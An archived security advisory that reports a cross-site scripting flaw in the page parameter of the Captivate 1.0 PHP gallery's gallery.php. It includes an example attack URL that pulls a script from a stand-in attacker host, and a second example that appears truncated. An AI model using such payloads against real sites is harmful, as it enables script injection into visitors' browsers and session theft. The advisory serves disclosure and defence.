TUCoPS :: Web :: Apps :: b06-2348.htm

Captivate 1.0 - XSS Vuln
Captivate 1.0 - XSS Vuln
Captivate 1.0 - XSS Vuln



Captivate 1.0=0D
=0D
Homepage:=0D
http://new-place.org/scripts/=0D 
=0D
Description:=0D
A basic but highly-customizable PHP gallery script with optional thumbnail creation.  Designed with screencaps in mind, it works best for large galleries of same-sized images. =0D
=0D
Effected files:=0D
gallery.php=0D
=0D
Inproper filtering of action ?page= can lead to XSS.=0D
=0D
Exploit:=0D
One way to XSS would be renaming your JavaScript file to an image as an XSS vector:=0D
http://www.example.com/gallery.php?page=5 SRC=http://evilsite.com/xss.jpg>=0D 
=0D
Anoother one be:=0D
http://www.example.com/gallery.php?page==0D 
=0D
The current version of this script puts slashes in for ' and " but alot of other characters aren't filtered.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH